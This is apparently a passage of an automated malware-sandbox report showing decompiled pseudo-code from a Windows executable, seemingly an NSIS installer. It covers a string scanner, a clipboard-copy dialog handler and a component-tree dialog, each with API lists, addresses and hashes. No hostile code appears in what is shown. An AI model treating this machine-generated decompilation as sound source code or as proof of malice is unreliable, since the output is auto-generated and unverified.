                                                • Instruction ID: 25801f27feaadc63e0c23ae6d5f917682d27e8bc7d9ad1472eb802ffa7caf717
                                                • Opcode Fuzzy Hash: de52c7a2a910bc3da80fb7f00694c34356361307f5662ff296472372640bc7ed
                                                • Instruction Fuzzy Hash: E4B01232954300BFDA114B00DE05F057B72B758700F208030B340380F0C2712420DB0D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00405513, Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00405513(CHAR* _a4, intOrPtr _a8) {
				CHAR* _t3;
				char _t4;

				_t3 = _a4;
				while(1) {
					_t4 =  *_t3;
					if(_t4 == 0) {
						break;
					}
					if(_t4 != _a8) {
						_t3 = CharNextA(_t3); // executed
						continue;
					}
					break;
				}
				return _t3;
			}





                                                0x00405513
                                                0x00405526
                                                0x00405526
                                                0x0040552a
                                                0x00000000
                                                0x00000000
                                                0x0040551d
                                                0x00405520
                                                0x00000000
                                                0x00405520
                                                0x00000000
                                                0x0040551d
                                                0x0040552c

                                                APIs
                                                • CharNextA.USER32(?,00405C69,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040313E,C:\Users\user\AppData\Local\Temp\,00000000,004031CE), ref: 00405520
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.241753513.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.241750332.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241758255.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241763299.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241768639.0000000000414000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241776027.0000000000420000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241783328.000000000042C000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241788000.0000000000435000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241791711.0000000000438000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: CharNext
                                                • String ID:
                                                • API String ID: 3213498283-0
                                                • Opcode ID: b411918ab1eb26758375c035e9adf1183577ea404a955402d598b5c9ffb07099
                                                • Instruction ID: d98e64288576e9f537158b0ae79c303fb9d432612cc41b77a198a36656f0f308
                                                • Opcode Fuzzy Hash: b411918ab1eb26758375c035e9adf1183577ea404a955402d598b5c9ffb07099
                                                • Instruction Fuzzy Hash: 7FC0807040C58077C5106720993446B7FF2EA93344F1844A6F0C463155C1346C00CF3B
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                Function 00404EBC, Relevance: 66.8, APIs: 37, Strings: 1, Instructions: 277windowclipboardmemoryCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 90%
                                                			E00404EBC(long _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				struct tagRECT _v24;
				void* _v32;
				signed int _v36;
				int _v40;
				CHAR* _v44;
				signed int _v48;
				int _v52;
				void* _v56;
				void* _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t86;
				struct HMENU__* _t88;
				unsigned int _t91;
				unsigned int _t92;
				int _t93;
				int _t94;
				long _t97;
				void* _t100;
				intOrPtr _t123;
				struct HWND__* _t127;
				int _t148;
				int _t149;
				struct HWND__* _t153;
				struct HWND__* _t157;
				struct HMENU__* _t159;
				long _t161;
				CHAR* _t162;
				CHAR* _t163;

				_t153 =  *0x42ec04; // 0x0
				_t148 = 0;
				_v8 = _t153;
				if(_a8 != 0x110) {
					__eflags = _a8 - 0x405;
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00404E50, GetDlgItem(_a4, 0x3ec), 0,  &_a4));
					}
					__eflags = _a8 - 0x111;
					if(_a8 != 0x111) {
						L16:
						__eflags = _a8 - 0x404;
						if(_a8 != 0x404) {
							L24:
							__eflags = _a8 - 0x7b;
							if(_a8 != 0x7b) {
								goto L19;
							}
							__eflags = _a12 - _t153;
							if(_a12 != _t153) {
								goto L19;
							}
							_t86 = SendMessageA(_t153, 0x1004, _t148, _t148);
							__eflags = _t86 - _t148;
							_a8 = _t86;
							if(_t86 <= _t148) {
								L36:
								return 0;
							}
							_t88 = CreatePopupMenu();
							_push(0xffffffe1);
							_push(_t148);
							_t159 = _t88;
							AppendMenuA(_t159, _t148, 1, E004059FD(_t148, _t153, _t159));
							_t91 = _a16;
							__eflags = _t91 - 0xffffffff;
							if(_t91 != 0xffffffff) {
								_t149 = _t91;
								_t92 = _t91 >> 0x10;
								__eflags = _t92;
								_t93 = _t92;
							} else {
								GetWindowRect(_t153,  &_v24);
								_t149 = _v24.left;
								_t93 = _v24.top;
							}
							_t94 = TrackPopupMenu(_t159, 0x180, _t149, _t93, _t148, _t153, _t148);
							_t161 = 1;
							__eflags = _t94 - 1;
							if(_t94 == 1) {
								_v56 = _t148;
								_v44 = 0x42a8a0;
								_v40 = 0xfff;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t97 = SendMessageA(_v8, 0x102d, _a4,  &_v64);
									__eflags = _a4 - _t148;
									_t161 = _t161 + _t97 + 2;
								} while (_a4 != _t148);
								OpenClipboard(_t148);
								EmptyClipboard();
								_t100 = GlobalAlloc(0x42, _t161);
								_a4 = _t100;
								_t162 = GlobalLock(_t100);
								do {
									_v44 = _t162;
									SendMessageA(_v8, 0x102d, _t148,  &_v64);
									_t163 =  &(_t162[lstrlenA(_t162)]);
									 *_t163 = 0xa0d;
									_t162 =  &(_t163[2]);
									_t148 = _t148 + 1;
									__eflags = _t148 - _a8;
								} while (_t148 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(1, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						__eflags =  *0x42ebec - _t148; // 0x0
						if(__eflags == 0) {
							ShowWindow( *0x42f424, 8);
							__eflags =  *0x42f4ac - _t148;
							if( *0x42f4ac == _t148) {
								E00404D7E( *((intOrPtr*)( *0x42a078 + 0x34)), _t148);
							}
							E00403D9C(1);
							goto L24;
						}
						 *0x429c70 = 2;
						E00403D9C(0x78);
						goto L19;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L19:
							return E00403E2A(_a8, _a12, _a16);
						}
						ShowWindow( *0x42ebf0, _t148);
						ShowWindow(_t153, 8);
						E00404196();
						goto L16;
					}
				}
				_v48 = _v48 | 0xffffffff;
				_v36 = _v36 | 0xffffffff;
				_v56 = 2;
				_v52 = 0;
				_v44 = 0;
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				_t123 =  *0x42f428;
				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
				_a12 =  *((intOrPtr*)(_t123 + 0x60));
				 *0x42ebf0 = GetDlgItem(_a4, 0x403);
				 *0x42ebe8 = GetDlgItem(_a4, 0x3ee);
				_t127 = GetDlgItem(_a4, 0x3f8);
				 *0x42ec04 = _t127;
				_v8 = _t127;
				E00403DF8( *0x42ebf0);
				 *0x42ebf4 = E00404616(4);
				 *0x42ec0c = 0;
				GetClientRect(_v8,  &_v24);
				_v48 = _v24.right - GetSystemMetrics(0x15);
				SendMessageA(_v8, 0x101b, 0,  &_v56);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a8);
					SendMessageA(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t148) {
					SendMessageA(_v8, 0x1024, _t148, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00403DC3(_a4);
				if(( *0x42f430 & 0x00000003) != 0) {
					ShowWindow( *0x42ebf0, _t148);
					if(( *0x42f430 & 0x00000002) != 0) {
						 *0x42ebf0 = _t148;
					} else {
						ShowWindow(_v8, 8);
					}
				}
				_t157 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t157, 0x401, _t148, 0x75300000);
				if(( *0x42f430 & 0x00000004) != 0) {
					SendMessageA(_t157, 0x409, _t148, _a12);
					SendMessageA(_t157, 0x2001, _t148, _a8);
				}
				goto L36;
			}


































                                                0x00404ec5
                                                0x00404ecb
                                                0x00404ed4
                                                0x00404ed7
                                                0x0040505d
                                                0x00405064
                                                0x00405088
                                                0x00405088
                                                0x0040508e
                                                0x0040509b
                                                0x004050b8
                                                0x004050b8
                                                0x004050bf
                                                0x00405116
                                                0x00405116
                                                0x0040511a
                                                0x00000000
                                                0x00000000
                                                0x0040511c
                                                0x0040511f
                                                0x00000000
                                                0x00000000
                                                0x00405129
                                                0x0040512f
                                                0x00405131
                                                0x00405134
                                                0x00405231
                                                0x00000000
                                                0x00405231
                                                0x0040513a
                                                0x00405140
                                                0x00405142
                                                0x00405143
                                                0x0040514f
                                                0x00405155
                                                0x00405158
                                                0x0040515b
                                                0x00405170
                                                0x00405173
                                                0x00405173
                                                0x00405176
                                                0x0040515d
                                                0x00405162
                                                0x00405168
                                                0x0040516b
                                                0x0040516b
                                                0x00405184
                                                0x0040518c
                                                0x0040518d
                                                0x0040518f
                                                0x00405198
                                                0x0040519b
                                                0x004051a2
                                                0x004051a9
                                                0x004051b1
                                                0x004051b1
                                                0x004051bf
                                                0x004051c5
                                                0x004051c8
                                                0x004051c8
                                                0x004051cf
                                                0x004051d5
                                                0x004051de
                                                0x004051e5
                                                0x004051ee
                                                0x004051f0
                                                0x004051f3
                                                0x004051fc
                                                0x00405208
                                                0x0040520a
                                                0x00405210
                                                0x00405211
                                                0x00405212
                                                0x00405212
                                                0x0040521a
                                                0x00405225
                                                0x0040522b
                                                0x0040522b
                                                0x00000000
                                                0x0040518f
                                                0x004050c1
                                                0x004050c7
                                                0x004050f7
                                                0x004050f9
                                                0x004050ff
                                                0x0040510a
                                                0x0040510a
                                                0x00405111
                                                0x00000000
                                                0x00405111
                                                0x004050cb
                                                0x004050d5
                                                0x00000000
                                                0x0040509d
                                                0x0040509d
                                                0x004050a3
                                                0x004050da
                                                0x00000000
                                                0x004050e3
                                                0x004050ac
                                                0x004050b1
                                                0x004050b3
                                                0x00000000
                                                0x004050b3
                                                0x0040509b
                                                0x00404edd
                                                0x00404ee1
                                                0x00404eea
                                                0x00404ef1
                                                0x00404ef4
                                                0x00404ef7
                                                0x00404efa
                                                0x00404efb
                                                0x00404efc
                                                0x00404f15
                                                0x00404f18
                                                0x00404f22
                                                0x00404f31
                                                0x00404f39
                                                0x00404f41
                                                0x00404f46
                                                0x00404f49
                                                0x00404f55
                                                0x00404f5e
                                                0x00404f67
                                                0x00404f8a
                                                0x00404f90
                                                0x00404fa1
                                                0x00404fa6
                                                0x00404fb4
                                                0x00404fc2
                                                0x00404fc2
                                                0x00404fc7
                                                0x00404fd5
                                                0x00404fd5
                                                0x00404fda
                                                0x00404fdd
                                                0x00404fe2
                                                0x00404fee
                                                0x00404ff7
                                                0x00405004
                                                0x00405013
                                                0x00405006
                                                0x0040500b
                                                0x0040500b
                                                0x00405004
                                                0x00405028
                                                0x00405031
                                                0x0040503a
                                                0x0040504a
                                                0x00405056
                                                0x00405056
                                                0x00000000

                                                APIs
                                                • GetDlgItem.USER32 ref: 00404F1B
                                                • GetDlgItem.USER32 ref: 00404F2A
                                                • GetDlgItem.USER32 ref: 00404F39
                                                  • Part of subcall function 00403DF8: SendMessageA.USER32 ref: 00403E06
                                                • GetClientRect.USER32 ref: 00404F67
                                                • GetSystemMetrics.USER32 ref: 00404F6F
                                                • SendMessageA.USER32 ref: 00404F90
                                                • SendMessageA.USER32 ref: 00404FA1
                                                • SendMessageA.USER32 ref: 00404FB4
                                                • SendMessageA.USER32 ref: 00404FC2
                                                • SendMessageA.USER32 ref: 00404FD5
                                                • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00404FF7
                                                • ShowWindow.USER32(?,00000008), ref: 0040500B
                                                • GetDlgItem.USER32 ref: 00405021
                                                • SendMessageA.USER32 ref: 00405031
                                                • SendMessageA.USER32 ref: 0040504A
                                                • SendMessageA.USER32 ref: 00405056
                                                • GetDlgItem.USER32 ref: 00405073
                                                • CreateThread.KERNEL32 ref: 00405081
                                                • CloseHandle.KERNEL32(00000000), ref: 00405088
                                                • ShowWindow.USER32(00000000), ref: 004050AC
                                                • ShowWindow.USER32(00000000,00000008), ref: 004050B1
                                                • ShowWindow.USER32(00000008), ref: 004050F7
                                                • SendMessageA.USER32 ref: 00405129
                                                • CreatePopupMenu.USER32 ref: 0040513A
                                                • AppendMenuA.USER32 ref: 0040514F
                                                • GetWindowRect.USER32 ref: 00405162
                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,00000000,00000000), ref: 00405184
                                                • SendMessageA.USER32 ref: 004051BF
                                                • OpenClipboard.USER32(00000000), ref: 004051CF
                                                • EmptyClipboard.USER32(?,?,00000000,00000000,00000000), ref: 004051D5
                                                • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,00000000,00000000), ref: 004051DE
                                                • GlobalLock.KERNEL32 ref: 004051E8
                                                • SendMessageA.USER32 ref: 004051FC
                                                • lstrlenA.KERNEL32(00000000,?,?,00000000,00000000,00000000), ref: 00405203
                                                • GlobalUnlock.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000), ref: 0040521A
                                                • SetClipboardData.USER32 ref: 00405225
                                                • CloseClipboard.USER32(?,?,00000000,00000000,00000000), ref: 0040522B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.241753513.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.241750332.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241758255.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241763299.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241768639.0000000000414000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241776027.0000000000420000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241783328.000000000042C000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241788000.0000000000435000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241791711.0000000000438000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlocklstrlen
                                                • String ID: {
                                                • API String ID: 1050754034-366298937
                                                • Opcode ID: bb195872a3db692d4f828066a8d1e4032435f681960caf5b55af3d3660bbe9d3
                                                • Instruction ID: a9b8c0cf866c2a3c8f14101a7fbd3d30c206ebeedcb3c516614c272958fa201a
                                                • Opcode Fuzzy Hash: bb195872a3db692d4f828066a8d1e4032435f681960caf5b55af3d3660bbe9d3
                                                • Instruction Fuzzy Hash: 59A14B70900208BFDB11AF61DD89EAE7F79FB04354F50813AFA05BA1A0C7759A41DFA9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004046C3, Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 477windowmemoryCOMMONCrypto
                                                Download Yara Rule
                                                C-Code - Quality: 93%
                                                			E004046C3(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				intOrPtr _v20;
				struct HBITMAP__* _v24;
				long _v28;
				int _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				intOrPtr _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t182;
				int _t196;
				intOrPtr _t198;
				long _t202;
				signed int _t206;
				signed int _t217;
				void* _t220;
				void* _t221;
				int _t227;
				signed int _t232;
				signed int _t233;
				signed int _t240;
				void* _t252;
				intOrPtr _t258;
				char* _t268;
				signed char _t269;
				long _t274;
				int _t280;
				signed int* _t281;
				int _t282;
				long _t283;
				int _t285;
				long _t286;
				signed int _t287;
				long _t288;
				signed int _t291;
				signed int _t298;
				signed int _t300;
				signed int _t302;
				int* _t310;
				void* _t311;
				int _t315;
				int _t316;
				int _t317;
				signed int _t318;
				void* _t320;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_t182 = GetDlgItem(_a4, 0x408);
				_t280 =  *0x42f448;
				_t320 = SendMessageA;
				_v8 = _t182;
				_t315 = 0;
				_v32 = _t280;
				_v20 =  *0x42f428 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t289 = _a16;
					} else {
						_a12 = _t315;
						_t289 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t289;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t289 + 4)) == 0x408) {
							if(( *0x42f431 & 0x00000002) != 0) {
								L41:
								if(_v16 != _t315) {
									_t232 = _v16;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
									}
									_t233 = _v16;
									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) & 0xffffffdf;
										} else {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t289 = 0 | _a8 != 0x00000413;
								_t240 = E00404643(_v8, _a8 != 0x413);
								if(_t240 >= _t315) {
									_t93 = _t280 + 8; // 0x8
									_t310 = _t240 * 0x418 + _t93;
									_t289 =  *_t310;
									if((_t289 & 0x00000010) == 0) {
										if((_t289 & 0x00000040) == 0) {
											_t298 = _t289 ^ 0x00000001;
										} else {
											_t300 = _t289 ^ 0x00000080;
											if(_t300 >= 0) {
												_t298 = _t300 & 0xfffffffe;
											} else {
												_t298 = _t300 | 0x00000001;
											}
										}
										 *_t310 = _t298;
										E0040117D(_t240);
										_t289 = 1;
										_a8 = 0x40f;
										_a12 = 1;
										_a16 =  !( *0x42f430) >> 0x00000008 & 1;
									}
								}
								goto L41;
							}
							_t289 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageA(_v8, 0x200, _t315, _t315);
							}
							if(_a8 == 0x40b) {
								_t220 =  *0x42a884;
								if(_t220 != _t315) {
									ImageList_Destroy(_t220);
								}
								_t221 =  *0x42a898;
								if(_t221 != _t315) {
									GlobalFree(_t221);
								}
								 *0x42a884 = _t315;
								 *0x42a898 = _t315;
								 *0x42f480 = _t315;
							}
							if(_a8 != 0x40f) {
								L86:
								if(_a8 == 0x420 && ( *0x42f431 & 0x00000001) != 0) {
									_t316 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t316);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
								}
								goto L89;
							} else {
								E004011EF(_t289, _t315, _t315);
								if(_a12 != _t315) {
									E00401410(8);
								}
								if(_a16 == _t315) {
									L73:
									E004011EF(_t289, _t315, _t315);
									_v32 =  *0x42a898;
									_t196 =  *0x42f448;
									_v60 = 0xf030;
									_v16 = _t315;
									if( *0x42f44c <= _t315) {
										L84:
										InvalidateRect(_v8, _t315, 1);
										_t198 =  *0x42ebfc; // 0x5bda93
										if( *((intOrPtr*)(_t198 + 0x10)) != _t315) {
											E00404561(0x3ff, 0xfffffffb, E00404616(5));
										}
										goto L86;
									}
									_t281 = _t196 + 8;
									do {
										_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
										if(_t202 != _t315) {
											_t291 =  *_t281;
											_v68 = _t202;
											_v72 = 8;
											if((_t291 & 0x00000001) != 0) {
												_v72 = 9;
												_v56 =  &(_t281[4]);
												_t281[0] = _t281[0] & 0x000000fe;
											}
											if((_t291 & 0x00000040) == 0) {
												_t206 = (_t291 & 0x00000001) + 1;
												if((_t291 & 0x00000010) != 0) {
													_t206 = _t206 + 3;
												}
											} else {
												_t206 = 3;
											}
											_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
											SendMessageA(_v8, 0x1102, (_t291 >> 0x00000005 & 0x00000001) + 1, _v68);
											SendMessageA(_v8, 0x110d, _t315,  &_v72);
										}
										_v16 = _v16 + 1;
										_t281 =  &(_t281[0x106]);
									} while (_v16 <  *0x42f44c);
									goto L84;
								} else {
									_t282 = E004012E2( *0x42a898);
									E00401299(_t282);
									_t217 = 0;
									_t289 = 0;
									if(_t282 <= _t315) {
										L72:
										SendMessageA(_v12, 0x14e, _t289, _t315);
										_a16 = _t282;
										_a8 = 0x420;
										goto L73;
									} else {
										goto L69;
									}
									do {
										L69:
										if( *((intOrPtr*)(_v20 + _t217 * 4)) != _t315) {
											_t289 = _t289 + 1;
										}
										_t217 = _t217 + 1;
									} while (_t217 < _t282);
									goto L72;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L89;
						} else {
							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
							if(_t227 == 0xffffffff) {
								goto L89;
							}
							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
							if(_t283 == 0xffffffff ||  *((intOrPtr*)(_v20 + _t283 * 4)) == _t315) {
								_t283 = 0x20;
							}
							E00401299(_t283);
							SendMessageA(_a4, 0x420, _t315, _t283);
							_a12 = 1;
							_a16 = _t315;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					 *0x42f480 = _a4;
					_t285 = 2;
					_v28 = 0;
					_v16 = _t285;
					 *0x42a898 = GlobalAlloc(0x40,  *0x42f44c << 2);
					_v24 = LoadBitmapA( *0x42f420, 0x6e);
					 *0x42a894 = SetWindowLongA(_v8, 0xfffffffc, E00404CBD);
					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42a884 = _t252;
					ImageList_AddMasked(_t252, _v24, 0xff00ff);
					SendMessageA(_v8, 0x1109, _t285,  *0x42a884);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_v24);
					_t286 = 0;
					do {
						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
						if(_t258 != _t315) {
							if(_t286 != 0x20) {
								_v16 = _t315;
							}
							_push(_t258);
							_push(_t315);
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E004059FD(_t286, _t315, _t320)), _t286);
						}
						_t286 = _t286 + 1;
					} while (_t286 < 0x21);
					_t317 = _a16;
					_t287 = _v16;
					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
					_push(0x15);
					E00403DC3(_a4);
					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
					_push(0x16);
					E00403DC3(_a4);
					_t318 = 0;
					_t288 = 0;
					if( *0x42f44c <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t311 = _v32 + 8;
						_v24 = _t311;
						do {
							_t268 = _t311 + 0x10;
							if( *_t268 != 0) {
								_v60 = _t268;
								_t269 =  *_t311;
								_t302 = 0x20;
								_v84 = _t288;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t302;
								_v40 = _t318;
								_v68 = _t269 & _t302;
								if((_t269 & 0x00000002) == 0) {
									if((_t269 & 0x00000004) == 0) {
										 *( *0x42a898 + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
									} else {
										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_v28 = 1;
									 *( *0x42a898 + _t318 * 4) = _t274;
									_t288 =  *( *0x42a898 + _t318 * 4);
								}
							}
							_t318 = _t318 + 1;
							_t311 = _v24 + 0x418;
							_v24 = _t311;
						} while (_t318 <  *0x42f44c);
						if(_v28 != 0) {
							L20:
							if(_v16 != 0) {
								E00403DF8(_v8);
								_t280 = _v32;
								_t315 = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00403DF8(_v12);
								L89:
								return E00403E2A(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}



























































                                                0x004046e1
                                                0x004046e7
                                                0x004046e9
                                                0x004046ef
                                                0x004046f5
                                                0x00404702
                                                0x0040470b
                                                0x0040470e
                                                0x00404711
                                                0x00404932
                                                0x00404939
                                                0x0040494d
                                                0x0040493b
                                                0x0040493d
                                                0x00404940
                                                0x00404941
                                                0x00404948
                                                0x00404948
                                                0x00404959
                                                0x00404967
                                                0x0040496a
                                                0x00404980
                                                0x004049f8
                                                0x004049fb
                                                0x004049fd
                                                0x00404a07
                                                0x00404a15
                                                0x00404a15
                                                0x00404a17
                                                0x00404a21
                                                0x00404a27
                                                0x00404a48
                                                0x00404a29
                                                0x00404a36
                                                0x00404a36
                                                0x00404a27
                                                0x00404a21
                                                0x00000000
                                                0x004049fb
                                                0x00404985
                                                0x00404990
                                                0x00404995
                                                0x0040499c
                                                0x004049a3
                                                0x004049ad
                                                0x004049ad
                                                0x004049b1
                                                0x004049b6
                                                0x004049bb
                                                0x004049d1
                                                0x004049bd
                                                0x004049bd
                                                0x004049c5
                                                0x004049cc
                                                0x004049c7
                                                0x004049c7
                                                0x004049c7
                                                0x004049c5
                                                0x004049d5
                                                0x004049d7
                                                0x004049e5
                                                0x004049e6
                                                0x004049f2
                                                0x004049f5
                                                0x004049f5
                                                0x004049b6
                                                0x00000000
                                                0x004049a3
                                                0x00404987
                                                0x0040498e
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00404a4b
                                                0x00404a4b
                                                0x00404a52
                                                0x00404ac6
                                                0x00404acd
                                                0x00404ad9
                                                0x00404ad9
                                                0x00404ae2
                                                0x00404ae4
                                                0x00404aeb
                                                0x00404aee
                                                0x00404aee
                                                0x00404af4
                                                0x00404afb
                                                0x00404afe
                                                0x00404afe
                                                0x00404b04
                                                0x00404b0a
                                                0x00404b10
                                                0x00404b10
                                                0x00404b1d
                                                0x00404c6a
                                                0x00404c71
                                                0x00404c8e
                                                0x00404c94
                                                0x00404ca6
                                                0x00404ca6
                                                0x00000000
                                                0x00404b23
                                                0x00404b25
                                                0x00404b2d
                                                0x00404b31
                                                0x00404b31
                                                0x00404b39
                                                0x00404b7a
                                                0x00404b7c
                                                0x00404b8c
                                                0x00404b8f
                                                0x00404b94
                                                0x00404b9b
                                                0x00404b9e
                                                0x00404c40
                                                0x00404c46
                                                0x00404c4c
                                                0x00404c54
                                                0x00404c65
                                                0x00404c65
                                                0x00000000
                                                0x00404c54
                                                0x00404ba4
                                                0x00404ba7
                                                0x00404bad
                                                0x00404bb2
                                                0x00404bb4
                                                0x00404bb6
                                                0x00404bbc
                                                0x00404bc3
                                                0x00404bc8
                                                0x00404bcf
                                                0x00404bd2
                                                0x00404bd2
                                                0x00404bd9
                                                0x00404be5
                                                0x00404be9
                                                0x00404beb
                                                0x00404beb
                                                0x00404bdb
                                                0x00404bdd
                                                0x00404bdd
                                                0x00404c0b
                                                0x00404c17
                                                0x00404c26
                                                0x00404c26
                                                0x00404c28
                                                0x00404c2b
                                                0x00404c34
                                                0x00000000
                                                0x00404b3b
                                                0x00404b46
                                                0x00404b49
                                                0x00404b4e
                                                0x00404b50
                                                0x00404b54
                                                0x00404b64
                                                0x00404b6e
                                                0x00404b70
                                                0x00404b73
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00404b56
                                                0x00404b56
                                                0x00404b5c
                                                0x00404b5e
                                                0x00404b5e
                                                0x00404b5f
                                                0x00404b60
                                                0x00000000
                                                0x00404b56
                                                0x00404b39
                                                0x00404b1d
                                                0x00404a5a
                                                0x00000000
                                                0x00404a70
                                                0x00404a7a
                                                0x00404a7f
                                                0x00000000
                                                0x00000000
                                                0x00404a91
                                                0x00404a96
                                                0x00404aa2
                                                0x00404aa2
                                                0x00404aa4
                                                0x00404ab3
                                                0x00404ab5
                                                0x00404abc
                                                0x00404abf
                                                0x00000000
                                                0x00404abf
                                                0x00404a5a
                                                0x00404717
                                                0x0040471c
                                                0x00404726
                                                0x00404727
                                                0x00404730
                                                0x0040473b
                                                0x00404756
                                                0x00404768
                                                0x0040476d
                                                0x00404778
                                                0x00404781
                                                0x00404796
                                                0x004047a7
                                                0x004047b4
                                                0x004047b4
                                                0x004047b9
                                                0x004047bf
                                                0x004047c1
                                                0x004047c4
                                                0x004047c9
                                                0x004047ce
                                                0x004047d0
                                                0x004047d0
                                                0x004047d3
                                                0x004047d4
                                                0x004047f0
                                                0x004047f0
                                                0x004047f2
                                                0x004047f3
                                                0x004047f8
                                                0x004047fb
                                                0x004047fe
                                                0x00404802
                                                0x00404807
                                                0x0040480c
                                                0x00404810
                                                0x00404815
                                                0x0040481a
                                                0x0040481c
                                                0x00404824
                                                0x004048ee
                                                0x00404901
                                                0x00000000
                                                0x0040482a
                                                0x0040482d
